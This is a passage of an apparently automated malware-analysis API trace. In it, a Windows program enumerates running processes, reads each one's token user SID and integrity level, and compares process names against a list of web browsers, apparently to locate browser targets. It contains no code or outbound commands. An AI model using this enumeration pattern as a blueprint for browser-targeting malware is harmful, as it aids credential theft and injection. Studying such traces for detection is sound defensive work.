(lpString1="opera.exe", lpString2="lying-yourself.exe") returned 1 [0239.378] lstrcmpiW (lpString1="iexplore.exe", lpString2="lying-yourself.exe") returned -1 [0239.378] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="lying-yourself.exe") returned 1 [0239.378] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="lying-yourself.exe") returned 1 [0239.378] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x890) returned 0xb4 [0239.378] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0239.378] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0239.378] GetLastError () returned 0x7a [0239.378] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0239.379] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0239.379] CloseHandle (hObject=0xb8) returned 1 [0239.379] CloseHandle (hObject=0xb4) returned 1 [0239.379] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0239.379] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0239.379] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0239.379] GetLastError () returned 0x7a [0239.379] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0239.379] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0239.379] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0239.379] lstrcmpiW (lpString1="firefox.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0239.379] lstrcmpiW (lpString1="chrome.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned -1 [0239.379] lstrcmpiW (lpString1="opera.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0239.379] lstrcmpiW (lpString1="iexplore.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0239.379] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0239.379] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0239.379] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8a0) returned 0xb4 [0239.379] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0239.380] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0239.380] GetLastError () returned 0x7a [0239.380] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0239.380] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0239.380] CloseHandle (hObject=0xb8) returned 1 [0239.380] CloseHandle (hObject=0xb4) returned 1 [0239.380] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0239.380] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0239.380] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0239.380] GetLastError () returned 0x7a [0239.380] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0239.380] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0239.380] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0239.380] lstrcmpiW (lpString1="firefox.exe", lpString2="colleague wrap.exe") returned 1 [0239.380] lstrcmpiW (lpString1="chrome.exe", lpString2="colleague wrap.exe") returned -1 [0239.380] lstrcmpiW (lpString1="opera.exe", lpString2="colleague wrap.exe") returned 1 [0239.380] lstrcmpiW (lpString1="iexplore.exe", lpString2="colleague wrap.exe") returned 1 [0239.380] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="colleague wrap.exe") returned 1 [0239.381] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="colleague wrap.exe") returned 1 [0239.381] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8b0) returned 0xb4 [0239.381] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0239.381] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0239.381] GetLastError () returned 0x7a [0239.381] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0239.381] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0239.381] CloseHandle (hObject=0xb8) returned 1 [0239.381] CloseHandle (hObject=0xb4) returned 1 [0239.381] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0239.381] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0239.381] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0239.381] GetLastError () returned 0x7a [0239.381] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0239.381] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0239.381] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0239.381] lstrcmpiW (lpString1="firefox.exe", lpString2="hottest-jm-depression-fought.exe") returned -1 [0239.382] lstrcmpiW (lpString1="chrome.exe", lpString2="hottest-jm-depression-fought.exe") returned -1 [0239.382] lstrcmpiW (lpString1="opera.exe", lpString2="hottest-jm-depression-fought.exe") returned 1 [0239.382] lstrcmpiW (lpString1="iexplore.exe", lpString2="hottest-jm-depression-fought.exe") returned 1 [0239.382] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="hottest-jm-depression-fought.exe") returned 1 [0239.382] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="hottest-jm-depression-fought.exe") returned 1 [0239.382] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8c8) returned 0xb4 [0239.382] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0239.382] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0239.382] GetLastError () returned 0x7a [0239.382] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0239.382] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0239.382] CloseHandle (hObject=0xb8) returned 1 [0239.382] CloseHandle (hObject=0xb4) returned 1 [0239.382] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0239.382] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0239.382] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0239.382] GetLastError () returned 0x7a [0239.382] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0239.382] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0239.382] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0239.383] lstrcmpiW (lpString1="firefox.exe", lpString2="saturday.exe") returned -1 [0239.383] lstrcmpiW (lpString1="chrome.exe", lpString2="saturday.exe") returned -1 [0239.383] lstrcmpiW (lpString1="opera.exe", lpString2="saturday.exe") returned -1 [0239.383] lstrcmpiW (lpString1="iexplore.exe", lpString2="saturday.exe") returned -1 [0239.383] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="saturday.exe") returned -1 [0239.383] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="saturday.exe") returned -1 [0239.383] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9a0) returned 0x0 [0239.383] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9e0) returned 0x0 [0239.383] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbe8) returned 0x0 [0239.383] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6cc) returned 0x0 [0239.383] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa18) returned 0x0 [0239.383] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x634) returned 0xb4 [0239.383] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0239.383] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0239.383] GetLastError () returned 0x7a [0239.383] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0239.383] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0239.383] CloseHandle (hObject=0xb8) returned 1 [0239.383] CloseHandle (hObject=0xb4) returned 1 [0239.383] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0239.383] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0239.383] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0239.383] GetLastError () returned 0x7a [0239.384] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0239.384] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0239.384] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0239.384] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0239.384] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0239.384] lstrcmpiW (lpString1="opera.exe", lpString2="svchost.exe") returned -1 [0239.384] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0239.384] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="svchost.exe") returned -1 [0239.384] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="svchost.exe") returned -1 [0239.384] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1c4) returned 0xb4 [0239.384] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0239.384] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0239.384] GetLastError () returned 0x7a [0239.384] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0239.384] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0239.384] CloseHandle (hObject=0xb8) returned 1 [0239.384] CloseHandle (hObject=0xb4) returned 1 [0239.384] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0239.384] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0239.384] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0239.384] GetLastError () returned 0x7a [0239.385] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0239.385] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0239.385] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0239.385] lstrcmpiW (lpString1="firefox.exe", lpString2="dllhost.exe") returned 1 [0239.385] lstrcmpiW (lpString1="chrome.exe", lpString2="dllhost.exe") returned -1 [0239.385] lstrcmpiW (lpString1="opera.exe", lpString2="dllhost.exe") returned 1 [0239.385] lstrcmpiW (lpString1="iexplore.exe", lpString2="dllhost.exe") returned 1 [0239.385] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="dllhost.exe") returned 1 [0239.385] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="dllhost.exe") returned 1 [0239.385] VirtualFree (lpAddress=0x160000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0239.385] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x7d0) returned 0x102 [0241.393] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x4bfd5c | out: SystemInformation=0x0, ResultLength=0x4bfd5c*=0xbf10) returned 0xc0000004 [0241.393] VirtualAlloc (lpAddress=0x0, dwSize=0xcf10, flAllocationType=0x1000, flProtect=0x4) returned 0x160000 [0241.394] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0xcf10, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0x0 [0241.395] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0241.395] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0241.395] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0241.395] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x14c) returned 0x0 [0241.396] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0241.396] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0241.396] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0241.396] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0241.396] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e4) returned 0x0 [0241.396] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1ec) returned 0x0 [0241.396] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x258) returned 0x0 [0241.396] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0241.396] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0x0 [0241.396] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0x0 [0241.397] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0 [0241.397] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0 [0241.397] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0241.397] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0241.397] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x160) returned 0x0 [0241.397] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x418) returned 0x0 [0241.397] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4dc) returned 0x0 [0241.397] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4e4) returned 0xb4 [0241.397] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0241.398] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0241.398] GetLastError () returned 0x7a [0241.398] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0241.398] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0241.398] CloseHandle (hObject=0xb8) returned 1 [0241.398] CloseHandle (hObject=0xb4) returned 1 [0241.398] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0241.398] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0241.399] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0241.399] GetLastError () returned 0x7a [0241.399] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0241.399] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0241.399] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0241.399] lstrcmpiW (lpString1="firefox.exe", lpString2="taskhost.exe") returned -1 [0241.399] lstrcmpiW (lpString1="chrome.exe", lpString2="taskhost.exe") returned -1 [0241.399] lstrcmpiW (lpString1="opera.exe", lpString2="taskhost.exe") returned -1 [0241.399] lstrcmpiW (lpString1="iexplore.exe", lpString2="taskhost.exe") returned -1 [0241.399] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="taskhost.exe") returned -1 [0241.400] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="taskhost.exe") returned -1 [0241.400] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x560) returned 0xb4 [0241.400] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0241.400] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0241.400] GetLastError () returned 0x7a [0241.400] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0241.400] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0241.400] CloseHandle (hObject=0xb8) returned 1 [0241.400] CloseHandle (hObject=0xb4) returned 1 [0241.401] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0241.401] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0241.401] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0241.401] GetLastError () returned 0x7a [0241.401] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0241.401] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0241.401] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, 